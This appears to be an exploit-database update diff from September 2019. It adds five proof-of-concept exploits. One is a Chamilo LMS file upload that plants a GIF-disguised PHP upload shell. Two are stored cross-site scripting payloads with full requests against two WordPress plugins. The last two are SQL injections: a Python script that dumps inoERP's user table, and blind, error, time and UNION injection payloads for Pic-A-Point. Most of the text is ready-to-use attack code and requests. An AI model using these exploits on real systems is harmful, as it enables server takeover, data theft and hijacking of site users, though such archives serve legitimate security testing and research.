DB: 2019-09-27

5 changes to exploits/shellcodes

Chamillo LMS 1.11.8 - Arbitrary File Upload
Duplicate-Post 3.2.3 - Persistent Cross-Site Scripting
all-in-one-seo-pack 3.2.7 - Persistent Cross-Site Scripting
inoERP 4.15 - 'download' SQL Injection
citecodecrashers Pic-A-Point 1.1 - 'Consignment' SQL Injection

exploits/php/webapps/47423.txt

@@ -0,0 +1,55 @@
+# Exploit Title: Chamillo LMS 1.11.8 - Arbitrary File Upload 
+# Google Dork: "powered by chamilo"
+# Date: 2018-10-05
+# Exploit Author: Sohel Yousef jellyfish security team
+# Software Link: https://chamilo.org/en/download/
+# Version: Chamilo 1.11.8 or lower to 1.8 
+# Category: webapps
+
+# 1. Description
+# Any registered user can upload files and rename and change the file type to 
+# php5 or php7 by ckeditor module in my files section 
+
+# register here :
+# http://localhost/chamilo//main/auth/inscription.php
+# after registration you can view this sections 
+# http://localhost/chamilo/main/social/myfiles.php
+# http://localhost/chamilo/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0
+# upload your shell in gif format and then rename the format 
+# if the rename function was desabled and add this  GIF89;aGIF89;aGIF89;a   before <?PHP
+# to be like this for examlple
+
+GIF89;aGIF89;aGIF89;a<html>
+ <head>
+  <title>PHP Test</title>
+  <form action="" method="post" enctype="multipart/form-data">
+  <input type="file" name="fileToUpload" id="fileToUpload">
+  <input type="submit" value="upload file" name="submit">
+  </form>
+ </head>
+ <body>
+ <?php echo '<p>FILE UPLOAD</p><br>';
+ $tgt_dir = "uploads/";
+ $tgt_file = $tgt_dir.basename($_FILES['fileToUpload']['name']);
+ echo "<br>TARGET FILE= ".$tgt_file;
+ //$filename = $_FILES['fileToUpload']['name'];
+ echo "<br>FILE NAME FROM VARIABLE:- ".$_FILES["fileToUpload"]["name"];
+ if(isset($_POST['submit']))
+ {
+ if(file_exists("uploads/".$_FILES["fileToUpload"]["name"]))
+    { echo "<br>file exists, try with another name"; }
+ else   {
+         echo "<br>STARTING UPLOAD PROCESS<br>";
+        if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"],
+$tgt_file))
+        { echo "<br>File UPLOADED:- ".$tgt_file; }
+
+          else  { echo "<br>ERROR WHILE UPLOADING FILE<br>"; }
+    }
+ }
+?>
+ </body>
+</html>
+
+# and uplaod it as php.gif
+# you can browse the files form right click and click on browse option

exploits/php/webapps/47424.txt

@@ -0,0 +1,48 @@
+# Exploit Title: Duplicate-Post 3.2.3 - Persistent Cross-Site Scripting
+# Google Dork: N/A
+# Date: 2019-06-11
+# Exploit Author: Unk9vvN
+# Vendor Homepage: https://duplicate-post.lopo.it/
+# Software Link: https://wordpress.org/plugins/duplicate-post/
+# Version: 3.2.3
+# Tested on: Kali Linux
+# CVE: N/A
+
+# Description
+# This vulnerability is in the validation mode and is located in the plugin management panel and the vulnerability type is stored . the vulnerability parameters are as follows.
+
+1.Go to the 'Settings' section
+2.Enter the payload in the "Title prefix", "Title suffix", "Increase menu order by", "Do not copy these fields" sections
+3.Click the "Save Changes" option
+4.Your payload will run
+
+# URI: http://localhost/wp-admin/options-general.php?page=duplicatepost
+# Parameter & Payoad: 
+
+duplicate_post_title_prefix="><script>alert(1)</script>
+duplicate_post_title_suffix="><script>alert(1)</script>
+duplicate_post_increase_menu_order_by="><script>alert(1)</script>
+duplicate_post_blacklist="><script>alert(1)</script>
+
+
+#
+# PoC
+#
+POST /wp-admin/options.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/wp-admin/options-general.php?page=duplicatepost
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 981
+Connection: close
+Upgrade-Insecure-Requests: 1
+DNT: 1
+
+option_page=duplicate_post_group&action=update&_wpnonce=0e8a49a372&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dduplicatepost%26settings-updated%3Dtrue&duplicate_post_copytitle=1&duplicate_post_copyexcerpt=1&duplicate_post_copycontent=1&duplicate_post_copythumbnail=1&duplicate_post_copytemplate=1&duplicate_post_copyformat=1&duplicate_post_copymenuorder=1&duplicate_post_title_prefix=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duplicate_post_title_suffix=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duplicate_post_increase_menu_order_by=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duplicate_post_blacklist=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duplicate_post_roles%5B%5D=administrator&duplicate_post_roles%5B%5D=editor&duplicate_post_types_enabled%5B%5D=post&duplicate_post_types_enabled%5B%5D=page&duplicate_post_show_row=1&duplicate_post_show_submitbox=1&duplicate_post_show_adminbar=1&duplicate_post_show_bulkactions=1&duplicate_post_show_notice=1
+
+
+# Discovered by:
+https://t.me/Unk9vvN

exploits/php/webapps/47425.txt

@@ -0,0 +1,56 @@
+# Exploit Title: all-in-one-seo-pack 3.2.7 - Persistent Cross-Site Scripting
+# Google Dork: inurl:"\wp-content\plugins\all-in-one-seo-pack"
+# Date: 2019-06-13
+# Exploit Author: Unk9vvN
+# Vendor Homepage: https://semperplugins.com/all-in-one-seo-pack-pro-version
+# Software Link: https://wordpress.org/plugins/all-in-one-seo-pack/
+# Version: 3.2.7
+# Tested on: Windows 10
+# CVE: N/A
+
+# Description
+# This vulnerability is in the validation mode and is located in  the all-in-one-seo-pack tab inside the  and the vulnerability type is stored . the vulnerability parameters are as follows.
+
+1.Go to the 'all-in-one-seo-pack' tab
+2.Select 'general settings' section 
+3.Enter the payload in "Additional Front Page Headers","Additional Posts Page Headers" section
+4.Click the "Update Options" option
+4.Your payload will run on visit page
+
+
+# URI: http://localhost/wordpress/wp-admin/admin.php?page=all-in-one-seo-pack
+# Payload: "><script>alert(1)</script>
+
+#
+# PoC
+#
+POST /wordpress/wp-admin/admin.php?page=all-in-one-seo-pack%2Faioseop_class.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/wordpress/wp-admin/admin.php?page=all-in-one-seo-pack%2Faioseop_class.php
+Content-Type: multipart/form-data; boundary=---------------------------24442753012045
+Content-Length: 8625
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+-----------------------------24442753012045
+Content-Disposition: form-data; name="aiosp_front_meta_tags"
+
+"><script>alert(1)</script>
+-----------------------------24442753012045
+Content-Disposition: form-data; name="aiosp_home_meta_tags"
+
+"><script>alert(1)</script>
+-----------------------------24442753012045
+
+Content-Disposition: form-data; name="Submit"
+
+Update Options »
+-----------------------------24442753012045--
+
+
+# Discovered by:
+https://unk9vvn.com

exploits/php/webapps/47426.txt

@@ -0,0 +1,48 @@
+# Exploit Title: inoERP 4.15 - 'download' SQL Injection
+# Date: 2019-09-13
+# Exploit Author: Semen Alexandrovich Lyhin
+# Vendor Homepage: http://inoideas.org/
+# Version: 4.15
+# CVE: N/A
+
+
+# A malicious query can be sent in base64 encoding to unserialize() function. 
+# It can be deserialized as an array without any sanitization then. 
+# After it, each element of the array is passed directly to the SQL query. 
+
+
+#!/bin/python
+
+import os
+import base64
+import requests
+import sys
+
+def generatePayload(query):
+    #THIS FUNCTION IS INSECURE BY DESIGN
+    b64_query = base64.b64encode(query);
+    return os.popen("php -r \"echo base64_encode(serialize(base64_decode('" + b64_query + "')));\"").read()
+    
+
+def ExecSQL(query):
+    data = {"data":query,
+            "data_type":"sql_query"}
+         
+    r = requests.post("http://" + ip + "/download.php", data=data)
+    return r.content
+
+
+if __name__ == "__main__":
+    
+    if len(sys.argv) != 3:
+        print '(+) usage: %s <target> ' % sys.argv[0]
+        print '(+) eg: %s 127.0.0.1 "ierp/" ' % sys.argv[0]
+        exit()
+    
+    ip = sys.argv[1] + "/" + sys.argv[2]
+    
+    #if don't have php, set Payload to the next one to check this SQLi via "select @@version;" payload: czoxNzoic2VsZWN0IEBAdmVyc2lvbjsiOw== 
+    
+    data = r"select * from ino_user;"
+    
+    print ExecSQL(generatePayload(data));

exploits/php/webapps/47427.txt

@@ -0,0 +1,34 @@
+# Exploit Title: citecodecrashers Pic-A-Point 1.1 - 'Consignment' SQL Injection
+# Author: Cakes
+# Discovery Date: 2019-09-26
+# Vendor Homepage: https://github.com/citecodecrashers/Pic-A-Point
+# Software Link: https://github.com/citecodecrashers/Pic-A-Point/archive/master.zip
+# Tested Version: 1.1
+# Tested on OS: CentOS 7
+# CVE: N/A
+
+# Discription:
+# Simple SQL injection after application authentication. 
+
+# POST Request
+
+# Parameter: Consignment (POST)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
+
+Payload: Consignment=1234' AND 9752=(SELECT (CASE WHEN (9752=9752) THEN 9752 ELSE (SELECT 1018 UNION SELECT 3533) END))-- QBEy&Submit=Trace now
+
+# Type: error-based
+# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+
+Payload: Consignment=1234' AND (SELECT 4396 FROM(SELECT COUNT(*),CONCAT(0x7162707871,(SELECT (ELT(4396=4396,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- hufy&Submit=Trace now
+
+# Type: time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+
+Payload: Consignment=1234' AND (SELECT 9267 FROM (SELECT(SLEEP(5)))qpkL)-- OiWK&Submit=Trace now
+
+# Type: UNION query
+# Title: Generic UNION query (NULL) - 20 columns
+
+Payload: Consignment=1234' UNION ALL SELECT NULL,CONCAT(0x7162707871,0x614b666177515872456a7177706f6b654d54744e75644e4b597648496742464c6346656865654e67,0x716a7a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- cUud&Submit=Trace now

files_exploits.csv

@@ -41760,3 +41760,8 @@ id,file,description,date,author,type,platform,port
 47419,exploits/php/webapps/47419.txt,"WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting",2019-09-25,strider,webapps,php,
 47420,exploits/json/webapps/47420.txt,"NPMJS gitlabhook 0.0.17 - 'repository' Remote Command Execution",2019-09-25,"Semen Alexandrovich Lyhin",webapps,json,
 47422,exploits/php/webapps/47422.txt,"YzmCMS 5.3 - 'Host' Header Injection",2019-09-25,"Debashis Pal",webapps,php,
+47423,exploits/php/webapps/47423.txt,"Chamillo LMS 1.11.8 - Arbitrary File Upload",2019-09-26,"Sohel Yousef",webapps,php,
+47424,exploits/php/webapps/47424.txt,"Duplicate-Post 3.2.3 - Persistent Cross-Site Scripting",2019-09-26,Unk9vvN,webapps,php,
+47425,exploits/php/webapps/47425.txt,"all-in-one-seo-pack 3.2.7 - Persistent Cross-Site Scripting",2019-09-26,Unk9vvN,webapps,php,
+47426,exploits/php/webapps/47426.txt,"inoERP 4.15 - 'download' SQL Injection",2019-09-26,"Semen Alexandrovich Lyhin",webapps,php,
+47427,exploits/php/webapps/47427.txt,"citecodecrashers Pic-A-Point 1.1 - 'Consignment' SQL Injection",2019-09-26,cakes,webapps,php,